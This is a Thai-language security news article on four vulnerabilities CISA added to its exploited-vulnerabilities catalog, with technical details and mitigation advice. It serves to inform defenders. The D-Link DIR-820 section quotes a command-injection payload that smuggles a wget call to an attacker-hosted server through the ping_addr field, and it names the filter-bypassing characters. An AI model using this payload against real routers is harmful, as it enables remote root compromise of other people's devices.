CISA ได้เพิ่มช่องโหว่ใหม่ 4 รายการใน Known Exploited Vulnerabilities แค็ตตาล็อก จากการพบการโจมตีอย่างต่อเนื่อง ช่องโหว่เหล่านี้ทำให้เกิดความเสี่ยงที่สำคัญสำหรับองค์กรที่ใช้งานอุปกรณ์ที่ได้รับผลกระทบ
การอัปเดตของ CISA ได้เน้นย้ำถึงช่องโหว่ระดับ critical หลายรายการ โดยรายการแรก CVE-2023-25280 เป็นช่องโหว่ OS Command Injection ที่พบในเราเตอร์ D-Link DIR-820 รายการต่อมาคือ CVE-2020-15415 เป็นช่องโหว่ที่ส่งผลกระทบกับเราเตอร์หลายรุ่นของ DrayTek Vigor โดยเป็นช่องโหว่ OS command injection เช่นเดียวกัน
ช่องโหว่ที่สำคัญอีกหนึ่งรายการคือ CVE-2021-4043 เป็นช่องโหว่เกี่ยวกับการเรียกใช้ Null Pointer Dereference ใน Motion Spell GPAC และรายการสุดท้าย CVE-2019-0344 เป็นช่องโหว่ Deserialization ใน SAP Commerce Cloud
รายละเอียดทางเทคนิคของช่องโหว่
CVE-2023-25280: D-Link DIR-820 Router
เผยแพร่เมื่อวันที่ 16 มีนาคม 2023 ช่องโหว่ระดับ critical เป็นช่องโหว่ OS command injection ในเราเตอร์ D-Link DIR-820LA1_FW105B03 ที่สามารถทำให้ผู้ไม่หวังดีสามารถยกระดับสิทธิ์เป็น root ได้ ช่องโหว่นี้ถูกใช้ผ่านเพย์โหลดที่ออกแบบมาโดยเฉพาะ ซึ่งมุ่งเป้าไปที่พารามิเตอร์ ping_addr ซึ่งทำให้เกิดความเสี่ยงร้ายแรงกับอุปกรณ์ที่เชื่อมต่อกับอินเทอร์เน็ต โดยช่องโหว่ command injection นี้อยู่ในฟังก์ชัน pingV4Msg ของ ‘/ping.ccp’ component ทำให้ผู้ไม่หวังดีสามารถยกระดับสิทธื์เป็น root ได้
เวอร์ชันที่ได้รับผลกระทบคือ DIR820LA1_FW105B03 และรายละเอียดเกี่ยวกับช่องโหว่ระบุว่าอยู่ในไดเรกทอรีไฟล์ /sbin/ncc2 โดยฟังก์ชัน sub_49EDF8 ที่มีช่องโหว่จะดึงค่าของตัวแปร ping_addr จากการ request ไปยัง /ping.ccp ซึ่งช่วยให้สามารถรันคำสั่งบนระบบได้ เมื่อพารามิเตอร์ ccp_act ถูกตั้งค่าเป็น pingV4Msg ฟังก์ชัน ccp_ping จะอ้างอิงถึงฟังก์ชันที่มีช่องโหว่นี้ ทำให้เกิดช่องทางสำหรับการรันคำสั่ง
แม้จะมีความพยายามในการกรองอินพุตที่เป็นอันตราย แต่ฟังก์ชันดังกล่าวไม่ได้กรองสัญลักษณ์ เช่น %0a และ $ ทำให้ผู้ไม่หวังดีสามารถหลีกเลี่ยงการป้องกันได้ การทำซ้ำช่องโหว่นี้สามารถทำได้โดยทำตามขั้นตอนเฉพาะ ผ่านการจำลองเฟิร์มแวร์ด้วย FirmAE เช่น ผู้ไม่หวังดีอาจเริ่มต้นเว็บเซิร์ฟเวอร์ภายในเครือข่าย และใช้การโจมตีที่ออกแบบมาเฉพาะ เช่น 'ccp_act=pingV4Msg&ping_addr=%0awgethttp://192.168.0.2' เพื่อดำเนินการโจมตี
CVE-2020-15415: DrayTek Vigor Routers
ช่องโหว่นี้ส่งผลกระทบกับอุปกรณ์ DrayTek Vigor3900, Vigor2960, และ Vigor300B ที่ใช้เวอร์ชันก่อนหน้า 1.5.1 ทำให้สามารถรันคำสั่งจากระยะไกลผ่านการใช้ shell metacharacters ในชื่อไฟล์ โดยเฉพาะเมื่อมีการใช้ประเภทเนื้อหา text/x-python-script ซึ่งทำให้เกิดความเสี่ยงต่อผู้ใช้เราเตอร์เหล่านี้ คำแนะนำด้านความปลอดภัยที่เกี่ยวกับช่องโหว่นี้ถูกระบุใน CVE-2020-14472 และ CVE-2020-15415 ซึ่งทั้งสองรายการมีความรุนแรงระดับ critical
DrayTek ได้รับทราบถึงการโจมตีที่เกี่ยวข้องกับ WebUI ของรุ่น Vigor 2960, 3900, และ 300B โดยเมื่อวันที่ 17 มิถุนายน บริษัทได้ปล่อยเฟิร์มแวร์เวอร์ชันอัปเดตเพื่อแก้ไขช่องโหว่นี้ ผู้ใช้ที่ได้รับผลกระทบควรอัปเกรดเฟิร์มแวร์เป็นเวอร์ชัน 1.5.1.1 หรือใหม่กว่านี้โดยเร็วที่สุด ในระหว่างนี้ หากการอัปเกรดไม่สามารถทำได้ทันที ผู้ใช้ควรปิดการเข้าถึงระยะไกลของอุปกรณ์ หรือใช้งาน access control list (ACL) สำหรับการเข้าถึงระยะไกลจนกว่าจะสามารถอัปเกรดได้
การดาวน์โหลดเฟิร์มแวร์มีให้บริการเฉพาะสำหรับภูมิภาคสหราชอาณาจักร และไอร์แลนด์ ผู้ใช้ที่เปิดการเข้าถึงระยะไกลบนเราเตอร์ของตนควรปิดใช้งานหากไม่จำเป็น และหากต้องใช้งานการเข้าถึงระยะไกล ผู้ใช้งานสามารถอนุญาตการเข้าถึงระยะไกลเฉพาะผ่าน VPN ที่ปลอดภัย หรือใช้ VigorACS สำหรับการจัดการจากส่วนกลาง
CVE-2021-4043: Motion Spell GPAC
ช่องโหว่การเรียกใช้ null pointer ถูกรายงานเมื่อวันที่ 4 กุมภาพันธ์ 2022 ในไลบรารี GPAC ซึ่งส่งผลกระทบกับเวอร์ชันก่อนหน้า 1.1.0 และถูกจัดเป็นความเสี่ยงระดับปานกลาง โดยมีคะแนน CVSS ที่ 5.8 ช่องโหว่นี้ถูกจัดอยู่ภายใต้ CWE-476 ซึ่งมุ่งเน้นไปที่ปัญหาที่เกี่ยวข้องกับการเรียกใช้ null pointer โดยที่ผลิตภัณฑ์พยายามเข้าถึงพอยน์เตอร์ที่คาดว่าถูกต้อง แต่ความจริงแล้วเป็น null
ผลกระทบทั่วไปของช่องโหว่นี้ คือ denial of service (DoS) เนื่องจากการเรียกใช้ null pointer จะนำไปสู่การหยุดทำงานของ Process เว้นแต่จะมีการใช้การ exception handling อย่างเหมาะสม แม้จะมีการจัดการ exception การกู้คืนซอฟต์แวร์กลับสู่สถานะการทำงานที่ปลอดภัยก็ยังคงสามารถทำได้ยาก หากในกรณีที่ NULL ตรงกับที่อยู่หน่วยความจำ 0x0 และโค้ดที่มีสิทธิพิเศษสามารถเข้าถึงมันได้ อาจทำให้สามารถรันโค้ดที่ไม่ได้รับอนุญาต หรือจัดการหน่วยความจำได้
เพื่อลดความเสี่ยงที่เกี่ยวข้องกับช่องโหว่การเรียกใช้ null pointer การตรวจสอบพอยน์เตอร์ทั้งหมดที่อาจถูกแก้ไขให้เป็น NULL ก่อนใช้งานเป็นสิ่งสำคัญ การเลือกใช้ภาษาการเขียนโปรแกรมที่มีแนวโน้มลดความเสี่ยงต่อปัญหาเหล่านี้ก็สามารถช่วยแก้ปัญหาได้ นอกจากนี้นักพัฒนาควรตรวจสอบผลลัพธ์จากฟังก์ชันทั้งหมดที่ส่งค่ากลับเพื่อให้แน่ใจว่าไม่เป็น null ก่อนนำไปใช้งาน แม้ว่าการตรวจสอบค่าที่ส่งกลับจะมีประสิทธิภาพแล้ว แต่ก็จำเป็นต้องระมัดระวังเกี่ยวกับ race conditions ในระบบที่มีการทำงานพร้อมกัน
CVE-2019-0344: SAP Commerce Cloud
ถูกพบเมื่อวันที่ 14 สิงหาคม 2019 โดยเป็นช่องโหว่ใน SAP Commerce Cloud เกิดจากการถอดรหัสข้อมูลที่ไม่ปลอดภัย ส่งผลกระทบต่อหลายเวอร์ชัน และอนุญาตให้มีการรันโค้ดโดยใช้สิทธิ์ของผู้ใช้ 'Hybris' ช่องโหว่นี้มีหมายเลข CVE-2019-0344 ซึ่งมีผลกระทบเฉพาะกับเวอร์ชัน 6.4, 6.5, 6.6, 6.7, 1808, 1811, และ 1905 ของ virtualjdbc extension ซึ่งทำให้เกิดการโจมตีแบบ code injection
CVE-2019-0344 มีความเสี่ยงที่ทำให้ผู้ไม่หวังดีสามารถรันโค้ดที่เป็นอันตรายบนระบบเป้าหมายได้ เนื่องจากการถอดรหัสข้อมูลที่ไม่ปลอดภัยภายใน virtualjdbc extension ของ SAP Commerce Cloud การใช้ประโยชน์จากช่องโหว่นี้อาจทำให้เกิดการรันโค้ดที่ไม่ได้รับอนุญาตบนเครื่องที่ได้รับผลกระทบ โดยใช้สิทธิ์ที่เกี่ยวข้องกับผู้ใช้ 'Hybris' ได้
รายละเอียดทางเทคนิคของช่องโหว่ แสดงให้เห็นถึงกระบวนการถอดรหัสข้อมูลที่ไม่ปลอดภัยทำให้เกิดความเสี่ยงที่สำคัญในการแทรกโค้ดที่อันตราย เพื่อลดความเสี่ยง และป้องกันการใช้ประโยชน์จากช่องโหว่นี้ ผู้ใช้ควรติดตั้งแพตช์ด้านความปลอดภัยจาก SAP โดยทันที, ตรวจสอบการรันโค้ดที่ไม่ได้รับอนุญาต หรือพฤติกรรมที่ผิดปกติของระบบ และจำกัดการเข้าถึงไปยังระบบที่มีช่องโหว่
เพื่อความปลอดภัยในระยะยาว สิ่งสำคัญคือต้องอัปเดต และติดตั้งแพตช์ SAP Commerce Cloud อย่างสม่ำเสมอเพื่อตอบสนองต่อช่องโหว่ที่เกิดขึ้น และนำแนวทางการเขียนโค้ดที่ปลอดภัยมาใช้เพื่อป้องกันการโจมตีในลักษณะ code injection ในอนาคต ควรทำการตรวจสอบว่าระบบทั้งหมดที่ใช้ virtualjdbc extension ได้รับการอัปเดตแพตช์ด้านความปลอดภัยเวอร์ชันล่าสุด เนื่องจากเป็นสิ่งสำคัญในการรักษาความสมบูรณ์ และความปลอดภัยของแพลตฟอร์ม
คำแนะนำ และการลดผลกระทบ
- ตรวจสอบระบบอย่างสม่ำเสมอเพื่อตรวจสอบหาสัญญาณการโจมตีจากช่องโหว่เหล่านี้
- ตรวจสอบให้แน่ใจว่าทีม IT มีความรู้เกี่ยวกับช่องโหว่เหล่านี้ และขั้นตอนที่จำเป็นในการลดความเสี่ยง
- อัปเดตนโยบายด้านความปลอดภัย และแผนการตอบสนองต่อเหตุการณ์เพื่อตอบสนองต่อการโจมตีที่อาจเกิดขึ้นซึ่งเชื่อมโยงกับช่องโหว่เหล่านี้
ที่มา : cyble
You must be logged in to post a comment.